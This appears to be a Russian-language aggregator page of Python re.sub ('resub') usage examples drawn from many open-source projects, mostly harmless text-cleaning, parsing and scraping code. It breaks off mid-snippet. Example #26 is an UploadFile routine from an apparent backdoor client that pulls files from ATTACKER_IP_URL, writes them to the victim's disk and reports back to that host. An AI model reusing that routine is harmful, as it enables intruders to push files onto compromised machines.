Python resub примеры, re.resub Python примеры использования

Пример #1

0

Показать файл

Файл: cfg.py Проект: sagarhs88/Useful_Python_Scripts

    def _parse(self, string):
        """
        Parses the given string and stores all information in the instance

        :param string: MTS config-like multi-line string containing the MO definition
        :type string: str|unicode
        """
        # Get MO tag. e.g. [SIM VFB]
        try:
            self._tag = match(r'\[(.+)\]\s*\n', string).group(1)
        except AttributeError:
            raise MtsSectionError("The given string to be parsed does not specify a correct tag for the section.")

        # Get body
        body = resub(r'\\\s*\n\s*', '', resub(r'.+\]\s*\n', '', string))
        sub = lambda value: resub(r'^"', '', resub(r'"$', '', value))

        # Get parameters from within the body
        params_list = split(r'\s*\n\s*', body)
        for param in params_list:
            # If not is an empty line
            if not match(r'\s*$', param):
                # print param
                var, values = match(r'^(.+?)=(.+)$', param).groups()

                # Split values into a list
                values_list = split(r',\s*', values)

                # Store the parameter
                self._add_param(var, [sub(i) for i in values_list])

Пример #2

0

Показать файл

Файл: app.py Проект: tuanbe27/social-analyzer

    def fetch_url(queue, site, options):
        if options.output != "json":
            LOG.info("[Checking] " + get_fld(site["url"]))
        timeout = site["timeout"] if site["timeout"] != 0 else 10
        implicit = site["implicit"] if site["implicit"] != 0 else 5
        detections_count = 0
        source = get(site["url"].replace("{username}", req["body"]["string"]),
                     timeout=(implicit, timeout)).text
        text_only = "unavailable"
        title = "unavailable"
        temp_profile = {
            "found": 0,
            "link": "",
            "rate": "",
            "title": "",
            "text": ""
        }
        for detection in site["detections"]:
            temp_found = "false"
            if detection["type"] == "normal" and source != "" and detection[
                    "return"] == "true":
                detections_count += 1
                if detection["string"].replace(
                        "{username}",
                        req["body"]["string"]).lower() in source.lower():
                    temp_found = "true"
                if detection["return"] == temp_found:
                    temp_profile['found'] += 1

        if temp_profile["found"] > 0 and detections_count != 0:
            with ignore_excpetion():
                soup = BeautifulSoup(source, 'html.parser')
                [
                    tag.extract() for tag in soup(
                        ['head', 'title', 'style', 'script', '[document]'])
                ]
                temp_profile["text"] = soup.getText()
                temp_profile["text"] = resub("\s\s+", " ",
                                             temp_profile["text"])
                temp_profile["text"] = temp_profile["text"].replace(
                    "\n", "").replace("\t", "").replace("\r", "").strip()
            with ignore_excpetion():
                temp_profile["title"] = BeautifulSoup(
                    source, 'html.parser').title.string
                temp_profile["title"] = resub("\s\s+", " ",
                                              temp_profile["title"])
                temp_profile["title"] = temp_profile["title"].replace(
                    "\n", "").replace("\t", "").replace("\r", "").strip()
            if temp_profile["text"] == "":
                temp_profile["text"] = "unavailable"
            if temp_profile["title"] == "":
                temp_profile["title"] = "unavailable"
            temp_profile["rate"] = "%" + str(
                round(((temp_profile["found"] / detections_count) * 100), 2))
            temp_profile["link"] = site["url"].replace("{username}",
                                                       req["body"]["string"])
            copy_temp_profile = temp_profile.copy()
            queue.put([copy_temp_profile])
        else:
            queue.put(None)

Пример #3

0

Показать файл

Файл: NewsFinder.py Проект: QuantBooster/NewsApp

def IsValidTitle( txt,
                 expresion=r"[^a-zA-Z\s]|pdf|read|more|download|back|click"\
                 +"|pages?|view|continue|reading|format|opens?|window|new"\
                 +"|media|release|size|read|full|story"\
                 +"|january|february|march|april|may|june|july|august|september"\
                 +"|october|november|december|jan|feb|mar|apr|jun|jul"\
                 +"|aug|sep|oct|nov|dec"):
    txt = resub(expresion, '', txt.lower())
    txt = resub(" +", ' ', txt)
    if len(txt.split()) < 2:
        return False
    return True

Пример #4

0

Показать файл

Файл: splc_v2.py Проект: matt-black/rosalind

def splice_convert(sequence, introns):
    from re import sub as resub
    #print(sequence)
    for intron in introns:
        exon = resub(intron,'',sequence)
        sequence = exon
    #print(exon)
    exon2=resub('T','U',exon)
    start_ind = exon2.find('AUG')
    if start_ind > 0:
        ex_out = exon2[start_ind:]
    else:
        ex_out = exon2
        print("didn't find start codon")
    #print(ex_out)
    return ex_out

Пример #5

0

Показать файл

def write_new_ld_file(clusters, oldpath, newpath, threshold=1, **kwargs):
    '''
    clusters is created by get_new_segs above
    oldpath and newpath are the locations of LearningData.txt files, old and new 
    threshold defaults to 1 (inseparability measure)
    bigram clusters are sorted by their inseparability value;
    thus, if something that eventually becomes a trigram or tetragram has two-way parts in the current inseparability table, the bigram that is higher on the list will be replaced first.
    '''
    clustlist = sorted([x for x in clusters if clusters[x] >= threshold],
                       key=clusters.get,
                       reverse=True)
    with open(oldpath, 'r', encoding='utf-8') as f:
        with open(newpath, 'w', encoding='utf-8') as out:
            for line in f:
                word = line.strip()
                if '\t' in line:
                    word = line.split('\t')[0]
                    rest = line.split('\t')[1:]
                for clust in clustlist:
                    x = r'(^|\s)' + (clust) + r'(\s|$)'
                    y = r'\1' + ''.join(clust.split(" ")) + r'\2'
                    word = resub(x, y, word)
                if '\t' in line:
                    out.write(f"word\trest")
                else:
                    out.write(word + '\n')
    msg.env_render(
        message=
        f"\n\nWrote modified learning data to {newpath.split('simulation')[1]}",
        **kwargs)

Пример #6

0

Показать файл

Файл: testrun.py Проект: mkoepf/python-intmaniac

    def __init__(self, name, test_definition):
        self.name = name
        test_definition = deep_merge(default_config, test_definition)
        # quick shortcuts
        self.test_env = test_definition['environment']
        self.test_meta = test_definition['meta']
        self.test_commands = test_definition.get('test_commands', [])
        # take care of commands ...
        self.test_commands = _build_exec_array(self.test_commands)
        self.test_meta['test_before'] = \
            _build_exec_array(self.test_meta.get('test_before', None))
        self.test_meta['test_after'] = \
            _build_exec_array(self.test_meta.get('test_after', None))

        # okay.
        # let's keep all file references relative to the configuration
        # file. easy to remember.
        configfilepath = realpath(dirname(self.test_meta.get('_configfile',
                                                             './dummy')))
        # self.TEMPLATE / .TEMPLATE_NAME
        tmp = self.test_meta['docker_compose_template']
        if not isabs(tmp):
            tmp = realpath(join(configfilepath, tmp))
        self.template = tmp
        self.template_name = basename(self.template)
        # self.BASEDIR
        tmp = self.test_meta.get('test_basedir', configfilepath)
        if not isabs(tmp):
            tmp = realpath(join(configfilepath, tmp))
        self.base_dir = tmp
        # self.SANITIZED_NAME, .TEST_DIR
        self.sanitized_name = resub("[^a-zA-Z0-9_]", "-", self.name)
        self.test_dir = dbg_tr_get_testdir(self.base_dir, self.sanitized_name)
        # extend SELF.TEST_ENV with TEST_DIR
        self.test_env['test_dir'] = self.test_dir
        # create SELF.COMMANDLINE
        self.commandline = copy.copy(default_commandline_start)
        for param in self.test_meta['docker_compose_params']:
            self.commandline.append(param)
        for key, val in self.test_env.items():
            self.commandline.append("-e")
            self.commandline.append("%s=%s" % (key, val))
        self.commandline.append("--rm")
        self.commandline.extend(copy.copy(default_commandline_end))
        self.commandline.append(self.test_meta['test_service'])
        # create .STATE, .RESULT, .EXCEPTION, .REASON
        self.state = self.NOTRUN
        self.results = []
        self.exception = None
        self.reason = None
        # log setup
        # NO LOGGING BEFORE HERE
        log_filename = join(self.base_dir, basename(self.test_dir)) + ".log"
        self.log = get_logger("t-%s" % self.name, filename=log_filename)
        # some debug output
        self.log.info("base commandline '%s'" % " ".join(self.commandline))
        self.log.debug("test directory '%s'" % self.test_dir)
        self.log.debug("template path '%s'" % self.template)
        for key, val in self.test_env.items():
            self.log.debug("env %s=%s" % (key, val))

Пример #7

0

Показать файл

def simplify_string(text):
    """Simplify a string to remove special characters, double spaces and use lower case.

    Parameters
    ----------
    text: str
        string to clean

    Returns
    -------
    str

    Examples
    --------
    >>> text = ' (S . cerevisiáe  )'
    >>> simplify_string(text)
    's cerevisiae'

    """
    text = text.lower()
    text = ' '.join([t for t in text.split()])
    text = unidecode(text)
    text = resub(r"[^a-zA-Z0-9]+", ' ', text)
    text = ' '.join([t for t in text.split()]) #paranoia
    return text

Пример #8

0

Показать файл

Файл: stringsimilarity.py Проект: BlogForever/crawler

def cleanTags(string):
  """Remove all html tags from the string.

    >>> cleanTags("<html><head><title>Hello</title><body>Test</body></html>")
    'HelloTest'

  @type  string: string
  @param string: the string to clean
  @rtype: string
  @return: the cleaned up string
  """
  # http://lxml.de/api/lxml.html.clean.Cleaner-class.html
  htmlCleaned = Cleaner(allow_tags=[''], remove_unknown_tags=False, style=True
      ).clean_html(string or u"dummy")
  nice = htmlCleaned[5:-6] if htmlCleaned.startswith("<div>") else htmlCleaned
  return resub(r"\s\s+" , " ", resub(r"\s\s+" , " ", nice)).strip()

Пример #9

0

Показать файл

Файл: testrun.py Проект: flypenguin/python-intmaniac

 def __init__(self,
              name,
              compose_file,
              **kwargs):
     self.name = "{}".format(name if name else basename(compose_file))
     self.sanitized_name = "intmaniac{}".format(
         resub("[^a-z0-9]", "",
               self.name.lower() + basename(compose_file).lower())
     )
     self.template = compose_file
     self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                    run_kwargs={'throw': True})
     # extract "top level" parameters
     self.test_env = kwargs.pop('environment', {})
     self.test_image = kwargs.pop('image')
     self.test_linked_services = kwargs.pop('links')
     self.test_commands = _build_exec_array(kwargs.pop('commands', []))
     # save the rest
     self.meta = kwargs
     # state information
     self.test_state = self.NOTRUN
     self.test_results = []
     self.exception = None
     self.reason = None
     # run information - this can only be set after the env is running
     self.cleanup_test_containers = []
     self.run_containers = None
     # log setup
     self.log = get_logger("t-%s" % self.name)
     # some debug output
     self.log.debug("using template '%s'" % self.template)
     for key, val in self.test_env.items():
         self.log.debug("env %s=%s" % (key, val))

Пример #10

0

Показать файл

Файл: routes.py Проект: broothie/scrumtious

def index():
    if request.method == 'POST':
        # Create board details
        boardName = resub(r'[^-\w ]', '', request.form['boardName'])
        singleTokenBoardName = boardName.lower().replace(' ', '-')
        boardId = hashlib.sha1(boardName + datetime.now().__str__()).hexdigest()

        # Add board to database
        mongo.db.boards.insert_one({
            'boardId': boardId,
            'boardName': boardName,
            'singleTokenBoardName': singleTokenBoardName,
            'maxNid': 0,
            'notes': {}
        })

        # # Send email to creator
        # send_email(request.form['email'],
        #               'Link for the scrumboard %s' % boardName,
        #               creator_message % (boardName, singleTokenBoardName, boardId))

        # Redirect user to their new board
        return redirect('/%s/%s' % (singleTokenBoardName, boardId))

    # Render start page on GET
    return render_template('start.j2')

Пример #11

0

Показать файл

Файл: util.py Проект: IDEELResearch/sfspy

def sniff_dims(x):
    pattern = r"\#+dims\="
    if rematch(pattern, x):
        y = resub(pattern, "", x)
        dims = list(map(int, y.split(",")))
        return dims
    else:
        return None

Пример #12

0

Показать файл

Файл: NewsFinder.py Проект: QuantBooster/NewsApp

def FindPublishDate(dstr):
    for line in dstr[:300].split('\n\r\t'):
        line = resub("\W+", ' ', line).strip()
        pdate = ParseDateStr(line)
        if pdate:
            return pdate

    return ''

Пример #13

0

Показать файл

def create_replies_with_emojies(id, url):
    replies = list()
    try:
        uclient = ureq(url)
        tweet_html = uclient.read()
        uclient.close()
        tweet_soup = soup(tweet_html, 'html.parser')
        containers = tweet_soup.find_all('div',
                                         {'class': 'js-tweet-text-container'})
        if len(containers) > 1:
            record = False
        for container in containers:
            if record:
                reply = container.p.text.strip()
                reply = reply.replace('\n', ' ')
                reply = reply.replace('\r', '')
                reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*', ' ',
                              reply)
                emojis_used = ''
                if not reply.strip():
                    continue
                emojis = container.find_all('img',
                                            {'class': 'Emoji Emoji--forText'})
                for emoji in emojis:
                    # reply+="<"+emoji['title']+"-"+emoji['alt']+">"
                    emojis_used += " " + emoji['alt']
                footer = container.parent.find_all(
                    'div', {'class': 'stream-item-footer'})[0]
                retweet_count = \
                    footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', {
                        'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                liked_count = \
                    footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', {
                        'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                # print(reply, retweet_count, liked_count)
                if not retweet_count:
                    retweet_count = 0
                if not liked_count:
                    liked_count = 0
                reply = reply.replace(',', ' ')
                reply_data = [
                    str(id),
                    str(reply), emojis_used,
                    str(retweet_count),
                    str(liked_count)
                ]
                # print(reply_data)
                replies.append(reply_data)
                record = True
    except:
        t1, v1, trace = exc_info()
        print(t1)
        print(v1)
        print(trace)
        print('error occured with: ', url)
        replies.clear()
    return replies

Пример #14

0

Показать файл

def 英文字母_句子():
	global 结果串;
	读文件到列表(数据文件名);
	for 句子 in 数据列:
		s=resub(r'[^\w]','',句子) #空串
		s="--".join([i for i in s])	
		结果串=结果串+s+'\n';	
	将数据写入文件(结果串,结果文件名);
	return True;

Пример #15

0

Показать файл

def 英文文本():
	global 结果串;
	读文件到列表(数据文件名);
	for 句子 in 数据列:
		s=resub(r'[^\w\s]',' ',句子) #空格
		s="--".join(s.split()); #print(s);
		结果串=结果串+s+'\n';	
	将数据写入文件(结果串,结果文件名);
	return True;

Пример #16

0

Показать файл

Файл: sysutils.py Проект: lfwin/naglib

    def _write_system(self, system, inputf='input', config=None):
        from re import sub as resub
        if not config:
            config = self._config
        dirname = self._dirname
        filename = dirname + '/' + inputf

        polynomials = [p.factor() for p in system.polynomials]
        variables = system.variables
        parameters = system.parameters
        homvar = system.homvar
        num_polys = system.shape[0]

        options = config.keys()

        str_poly = [str(p) for p in polynomials]
        str_poly = [
            resub(string=p, pattern=r'\*\*', repl='^') for p in str_poly
        ]
        str_vars = [str(v) for v in variables]
        str_pars = [str(p) for p in parameters]

        poly_names = ['f{0}'.format(i + 1) for i in range(num_polys)]
        polys_named = zip(poly_names, str_poly)

        poly_list = ','.join([f for f in poly_names])
        vars_list = ','.join([v for v in str_vars])
        pars_list = ','.join([p for p in str_pars])

        fh = open(filename, 'w')

        # write the CONFIG section
        print('CONFIG', file=fh)
        for option in options:
            print('{0}:{1};'.format(option, config[option]), file=fh)
        print('END', file=fh)

        # write the INPUT section
        print('INPUT', file=fh)
        if parameters:
            print('parameter {0};'.format(pars_list), file=fh)
        if homvar:
            print('hom_variable_group {0};'.format(vars_list), file=fh)
        else:
            print('variable_group {0};'.format(vars_list), file=fh)
        print('function {0};'.format(poly_list), file=fh)

        for p in polys_named:
            # p is a key-value pair, e.g., ('f1', 'x^2 - 1')
            print('{0} = {1};'.format(p[0], p[1]), file=fh)
        print('END', file=fh)

        # finish up
        fh.close()

        return filename

Пример #17

0

Показать файл

def 英文字母_单词():
	global 结果串;
	读文件到列表(数据文件名);
	for 句子 in 数据列:
		s=resub(r'[^\w\s]',' ',句子) 
		for i in s.split():
			tmp="--".join([x for x in i])
			#print(tmp)
			结果串=结果串+tmp+'\n';	
	将数据写入文件(结果串,结果文件名);
	return True;

Пример #18

0

Показать файл

 def filter_file(self, connexion, mo):
     # extract the position of the matching pattern, then extract the
     # conversion string from the file convertion sequence
     groupdict = mo.groupdict()
     for group in groupdict:
         filename = groupdict[group]
         if not filename:
             continue
         filepattern = self.filepatterns[group]
         return resub(r'\{(\w+)\}', connexion._dynreplace, filepattern)
     raise TftpError(TftpError.NOT_DEF,
                     'Internal error, file matching pattern issue')

Пример #19

0

Показать файл

def replacing(what_to_replace: str, for_what: str, full_string: str) -> str:
    try:
        upper_list = [
            True if letter.isupper() else False for letter in refindall(
                what_to_replace, full_string, flags=reIGNORECASE)[0]
        ]
    except IndexError:
        return "False"
    if all(upper_list):
        return resub(what_to_replace,
                     for_what.upper(),
                     full_string,
                     flags=reIGNORECASE)

    replaced_word = ''.join(letter.upper() if is_upper else letter.lower()
                            for letter, is_upper in zip_longest(
                                for_what, upper_list, fillvalue=False))

    return resub(what_to_replace,
                 replaced_word,
                 full_string,
                 flags=reIGNORECASE)

Пример #20

0

Показать файл

    def startscrapping(self,id,url):
        self.replies_found = False
        with open(self.replies_title,"a",encoding="utf-8") as replies:
            try:
                uclient = ureq(url)
                tweet_html = uclient.read()
                uclient.close()
                tweet_soup = soup(tweet_html,'html.parser')
                containers = tweet_soup.find_all('div', {'class': 'js-tweet-text-container'})
                if len(containers) > 1:
                    record = False
                    for container in containers:
                        if record:
                            reply = container.p.text.strip()
                            reply = reply.replace('\n',' ')
                            reply = reply.replace('\r','')
                            reply = resub(r'https?:\/\/[a-zA-Z0-9@:%._\+~#=\/]*[ ]*',' ',reply)
                            if not reply.strip():
                                continue
                            emoji_used = ''
                            emojis = container.find_all('img',{'class':'Emoji Emoji--forText'})
                            for emoji in emojis:
                                # reply+="<"+emoji['title']+"-"+emoji['alt']+">"
                                emoji_used += emoji['alt'] + ' '
                            footer = container.parent.find_all('div', {'class': 'stream-item-footer'})[0]
                            retweet_count = footer.find_all('div', {'class': 'ProfileTweet-action--retweet'})[0].find_all('span', {
                                'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                            liked_count = footer.find_all('div', {'class': 'ProfileTweet-action--favorite'})[0].find_all('span', {
                                'class': 'ProfileTweet-actionCountForPresentation'})[0].text.strip()
                            # print(reply, retweet_count, liked_count)
                            if not retweet_count:
                                retweet_count = 0
                            if not liked_count:
                                liked_count = 0
                            reply = reply.replace(',',' ')
                            reply_data = str(id) + ',' + str(reply) +','+ emoji_used+ ',' + str(retweet_count) + ',' + str(liked_count) + '\n'
                            # print(reply_data)
                            replies.write(reply_data)
                            self.replies_found = True
                        record = True
            except:
                # t1, v1, trace = exc_info()
                # print(t1)
                # print(v1)
                # print(trace)
                print('error occured with: ',url)
                self.replies_found = False

# scrap = Scrapper('https://t.co/36UkqQikKc','932115407783174145')
# scrap.startscrapping()

Пример #21

0

Показать файл

Файл: common.py Проект: clever-crow-consulting/libtaxii

def gen_filename(collection_name, format_part, date_string, extension):
    """
    Creates a filename based on various properties of a Poll Request and Content Block

    :param collection_name: The collection name
    :param format_part: The format part (e.g., '_STIX_10_')
    :param date_string: A datestring
    :param extension: The file extension to use
    :return: A string containing the generated filename
    """

    filename = (
        collection_name.lstrip(".") + format_part + resub(r"[^a-zA-Z0-9]", "_", date_string) + extension
    ).translate(None, '/\\:*?"<>|')
    return filename

Пример #22

0

Показать файл

def gen_filename(collection_name, format_part, date_string, extension):
    """
    Creates a filename based on various properties of a Poll Request and Content Block

    :param collection_name: The collection name
    :param format_part: The format part (e.g., '_STIX_10_')
    :param date_string: A datestring
    :param extension: The file extension to use
    :return: A string containing the generated filename
    """

    filename = (collection_name.lstrip(".") + format_part +
                resub(r"[^a-zA-Z0-9]", "_", date_string) +
                extension).translate(None, '/\\:*?"<>|')
    return filename

Пример #23

0

Показать файл

Файл: data_object_explore.py Проект: 1havran/neo4test

def clean_data(my_string):
    '''
    clean_data cleans my_string argument. It removes non-printable characters,
    specific csv characters and replaces empty chars in beginning and end.
    It also removes 'spliiter', specific string used for objects and relations.
    '''

    rexes = ['^ *', ' *$', SPLITTER]
    char_to_remove = ["'", '"', ',']
    clean_s = ''
    for char in my_string:
        if char in printable and char not in char_to_remove:
            clean_s += char
    for regex in rexes:
        clean_s = resub(regex, '', clean_s)
    return clean_s

Пример #24

0

Показать файл

Файл: NewsFinder.py Проект: QuantBooster/NewsApp

def ParseDateStr(dstr):
    if len(dstr) == 0:
        return ''
    dstr = ' ' + dstr.lower() + ' '
    dstr = resub('[\W\d](th|st|nd|rd)\W', '', dstr).strip()

    try:
        dobjs = extract_dates(dstr, return_precision=True, debug=False)
        for o in dobjs:
            if o[1] == 'day':
                dobj = o[0].replace(tzinfo=None)
                if dobj <= cdate:
                    return dobj
    except:
        return ''

    return ''

Пример #25

0

Показать файл

Файл: data_object_explore.py Проект: 1havran/neo4test

def get_files_prefixes(fs_path="./input", suffix=".csv$"):
    '''
    get_files_prefixes will search in the path and returns all files that
    contains objects and relations for the graph
    '''

    files_prefix = {}
    for _, _, files in walk(fs_path):
        for name in files:
            base_name = resub(suffix, '', name)
            name_parts = base_name.split(SPLITTER)

            if name_parts[0] == OBJECT_FILE_PREFIX or name_parts[
                    0] == RELATIONS_FILE_PREFIX:
                if name_parts[0] not in files_prefix.keys():
                    files_prefix[name_parts[0]] = set()
                files_prefix[name_parts[0]].add(name)
    return files_prefix

Пример #26

0

Показать файл

def UploadFile(command):
    upload = ""
    fileContentPath = ""
    try:
        upload, fileContentPath = command.split('::')
    except Exception as e:
        httpReq(ATTACKER_IP_URL,
                data="file=" +
                quote_plus('\n  [ERROR] Invalid command syntax.\n'))
        return

    try:
        fileBytes = httpReq(ATTACKER_IP_URL + '/uploadRequest',
                            data='file=' +
                            quote_plus(fileContentPath.replace('"', '')),
                            returnBytes=True)
        fName = httpReq(ATTACKER_IP_URL + '/uploadRequestFileName',
                        data='file=' +
                        quote_plus(fileContentPath.replace('"', ''))).encode()

        altchars = b'+/'
        fName = resub(rb'[^a-zA-Z0-9%s]+' % altchars, b'', fName)
        missing_padding = len(fName) % 4
        if missing_padding:
            fName += b'=' * (4 - missing_padding)

        fName = b64decode(fName, altchars)
        fName = fName.decode()

        try:
            with open(fName, 'wb') as f:
                f.write(fileBytes)
            httpReq(ATTACKER_IP_URL,
                    data="file=" +
                    quote_plus('\n  [INFO] Upload successful.\n'))
        except Exception as e:
            httpReq(
                ATTACKER_IP_URL,
                data="file=" + quote_plus(
                    '\n  [ERROR] An error occured when trying to upload.\n'))
            pass

    except Exception as e:
        httpReq(ATTACKER_IP_URL, data="file=" + quote_plus(str(e.args)))

Пример #27

0

Показать файл

Файл: views.py Проект: am1ty9d9v/oposod

def do_comment(request, dailyphoto_id):
    dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id)

    comment = request.POST.get('do_comment', '')
    comment = comment.strip()
    # Save the comment in DB.
    print "Comment Text: ", comment
    list_of_users_in_comment = [resub(r'\[|\]', r'', name)
                                for name in findall(r'\[[a-z0-9]+\]', comment)]
    for nuser in list_of_users_in_comment:
        print nuser
    if comment:
        Comments.objects.create(user=request.user,
                                dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id),
                                comment=comment,
                                )
        redis_obj = StrictRedis(db=9)
        redis_obj.publish("notifications:%s" % request.user.username, 1)
    return HttpResponseRedirect(
        reverse('users.views.browse_daily_photo_single', args=(str(dp_obj.user.username), dp_obj.key)))

Пример #28

0

Показать файл

Файл: poll_client.py Проект: guidovranken/libtaxii

    def handle_response(self, response, args):
        super(PollClient11Script, self).handle_response(response, args)

        if response.message_type == tm11.MSG_POLL_RESPONSE:
            if response.more:
                print "This response has More=True, to request additional parts, use the following command:"
                print "  fulfillment_client --collection %s --result-id %s --result-part-number %s\r\n" % \
                    (response.collection_name, response.result_id, response.result_part_number + 1)
            for cb in response.content_blocks:
                if cb.content_binding.binding_id == t.CB_STIX_XML_10:
                    format = '_STIX10_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_101:
                    format = '_STIX101_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_11:
                    format = '_STIX11_'
                    ext = '.xml'
                elif cb.content_binding.binding_id == t.CB_STIX_XML_111:
                    format = '_STIX111_'
                    ext = '.xml'
                else:  # Format and extension are unknown
                    format = ''
                    ext = ''

                if cb.timestamp_label:
                    date_string = 't' + cb.timestamp_label.isoformat()
                else:
                    date_string = 's' + datetime.datetime.now().isoformat()

                filename = (    response.collection_name.lstrip(".") +
                                format +
                                resub(r"[^a-zA-Z0-9]", "_", date_string) + ext
                                ).translate(None, '/\\:*?"<>|')
                filename = os.path.join(args.dest_dir, filename)

                f = open(filename, 'w')
                f.write(cb.content)
                f.flush()
                f.close()
                print "Wrote Content Block to %s" % filename

Пример #29

0

Показать файл

Файл: misc.py Проект: am1ty9d9v/oposod

def image_resize(image_path, new_size, maintain_ratio=False):
    save_dir = path.dirname(image_path)
    new_filename = '%s_%s' % (path.basename(image_path), new_size)
    resize_command = ['convert', "%s" % image_path]
    if not maintain_ratio:
        comm_args = '-resize "%s^" -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)
    else:
        image_size = check_output(['identify', "%s" % image_path])
        image_size = resub(r'.* ([0-9]+x[0-9]+) .*\n', r'\1', image_size)
        old_x, old_y = image_size.split('x')
        new_x, new_y = new_size.split('x')
        new_y = int((float(old_y) / float(old_x)) * float(new_x))
        new_size = "%sx%d" % (new_x, new_y)
        new_filename = '%s_%s' % (path.basename(image_path), new_x)

        comm_args = '-resize %s^ -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)

    resize_command.extend(shlex_split(comm_args))
    call(resize_command)

Пример #30

0

Показать файл

Файл: pxed.py Проект: heyange2002/pybootd

 def build_mac_acl(cls, entry: str) -> Tuple[int, int]:
     parts = entry.split('/', 1)
     values = []
     bitcount = cls.ACCESS_LOCAL['mac']
     maxval = (1 << bitcount) - 1
     for mask, part in enumerate(parts):
         try:
             if mask:
                 value = maxval & ~((1 << int(part)) - 1)
             else:
                 part = resub('[-:]', '', part)
                 value = int(part, 16)
                 value <<= bitcount - len(part) * 4
             if not 0 <= value <= maxval:
                 raise ValueError()
             values.append(value)
         except Exception:
             raise ValueError('Invalid ACL value: %s' % entry)
     if len(values) < 2:
         values.append(maxval)
     return tuple(values)

Пример #31

0

Показать файл

    def _clean_text(self, text_series):
        """
        Cleans a column of text. Removes all special characters, 
        websites, mentions etc.
        
        Parameters
        ----------

        text_series: Pandas.Series
        
        Returns
        -------
        
        Pandas.Series
            Cleaned text
        """
        from re import sub as resub
        text_series = text_series.apply(
            lambda x: resub(r"[^A-Za-z0-9 ]+|(\w+:\/\/\S+)|htt", " ", x
                            )).str.strip().str.lower()
        return text_series

Пример #32

0

Показать файл

def image_resize(image_path, new_size, maintain_ratio=False):
    save_dir = path.dirname(image_path)
    new_filename = '%s_%s' % (path.basename(image_path), new_size)
    resize_command = ['convert', "%s" % image_path]
    if not maintain_ratio:
        comm_args = '-resize "%s^" -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)
    else:
        image_size = check_output(['identify', "%s" % image_path])
        image_size = resub(r'.* ([0-9]+x[0-9]+) .*\n', r'\1', image_size)
        old_x, old_y = image_size.split('x')
        new_x, new_y = new_size.split('x')
        new_y = int((float(old_y) / float(old_x)) * float(new_x))
        new_size = "%sx%d" % (new_x, new_y)
        new_filename = '%s_%s' % (path.basename(image_path), new_x)

        comm_args = '-resize %s^ -gravity center  -extent %s "%s/%s"' \
                    % (new_size, new_size, save_dir, new_filename)

    resize_command.extend(shlex_split(comm_args))
    call(resize_command)

Пример #33

0

Показать файл

Файл: testrun.py Проект: lgilz/python-intmaniac

 def __init__(self,
              name,
              compose_file,
              **kwargs):
     self.name = "{}".format(name if name else basename(compose_file))
     self.sanitized_name = "intmaniac{}".format(
         resub("[^a-z0-9]", "",
               self.name.lower() + basename(compose_file).lower())
     )
     self.template = compose_file
     self.compose_wrapper = Compose(compose_file, self.sanitized_name,
                                    run_kwargs={'throw': True})
     # extract "top level" parameters
     self.test_env = kwargs.pop('environment', {})
     self.test_image = kwargs.pop('image')
     self.test_linked_services = kwargs.pop('links')
     self.test_commands = _build_exec_array(kwargs.pop('commands', []))
     # meta_information
     self.pull = kwargs.pop('pull', True)
     self.pre = kwargs.pop('pre', None)
     self.post = kwargs.pop('post', None)
     self.allow_failure = kwargs.pop('allow_failure', False)
     self.volumes = self.format_volume_mapping(kwargs.pop('volumes', []))
     # save the rest (run-arguments for docker.container.create())
     self.meta = kwargs
     # state information
     self.test_state = self.NOTRUN
     self.test_results = []
     self.exception = None
     self.reason = None
     # run information - this can only be set after the env is running
     self.cleanup_test_containers = []
     self.run_containers = None
     # log setup
     self.log = get_logger("t-%s" % self.name)
     # some debug output
     self.log.debug("using template '%s'" % self.template)
     for key, val in self.test_env.items():
         self.log.debug("env %s=%s" % (key, val))

Пример #34

0

Показать файл

def do_comment(request, dailyphoto_id):
    dp_obj = get_object_or_404(DailyPhoto, id=dailyphoto_id)

    comment = request.POST.get('do_comment', '')
    comment = comment.strip()
    # Save the comment in DB.
    print "Comment Text: ", comment
    list_of_users_in_comment = [
        resub(r'\[|\]', r'', name)
        for name in findall(r'\[[a-z0-9]+\]', comment)
    ]
    for nuser in list_of_users_in_comment:
        print nuser
    if comment:
        Comments.objects.create(
            user=request.user,
            dailyphoto=get_object_or_404(DailyPhoto, id=dailyphoto_id),
            comment=comment,
        )
        redis_obj = StrictRedis(db=9)
        redis_obj.publish("notifications:%s" % request.user.username, 1)
    return HttpResponseRedirect(
        reverse('users.views.browse_daily_photo_single',
                args=(str(dp_obj.user.username), dp_obj.key)))

Пример #35

0

Показать файл

Файл: app.py Проект: ryzbaka/social-analyzer

    def fetch_url(site, username, options):
        LOG.info("[Checking] " + get_fld(site["url"]))
        timeout = site["timeout"] if site["timeout"] != 0 else 10
        implicit = site["implicit"] if site["implicit"] != 0 else 5
        detections_count = 0
        source = ""
        with suppress(Exception):
            source = get(site["url"].replace("{username}", username),
                         timeout=(implicit, timeout)).text
        text_only = "unavailable"
        title = "unavailable"

        detection_level = {
            "extreme": {
                "fast": "normal",
                "slow": "normal,advanced,ocr",
                "detections": "true",
                "count": 1,
                "found": 2
            },
            "high": {
                "fast": "normal",
                "slow": "normal,advanced,ocr",
                "detections": "true,false",
                "count": 2,
                "found": 1
            },
            "current": "high"
        }

        temp_profile = {
            "found": 0,
            "image": "",
            "link": "",
            "rate": "",
            "title": "",
            "language": "",
            "text": "",
            "type": "",
            "good": "",
            "method": ""
        }

        for detection in site["detections"]:
            temp_found = "false"
            if detection['type'] in detection_level[
                    detection_level['current']]['fast'] and source != "":
                detections_count += 1
                if detection["string"].replace(
                        "{username}", username).lower() in source.lower():
                    temp_found = "true"
                if detection["return"] == temp_found:
                    temp_profile['found'] += 1

        if temp_profile['found'] >= detection_level[detection_level[
                'current']]['found'] and detections_count >= detection_level[
                    detection_level['current']]['count']:
            temp_profile['good'] = "true"

        with suppress(Exception):
            soup = BeautifulSoup(source, 'html.parser')
            [
                tag.extract() for tag in soup(
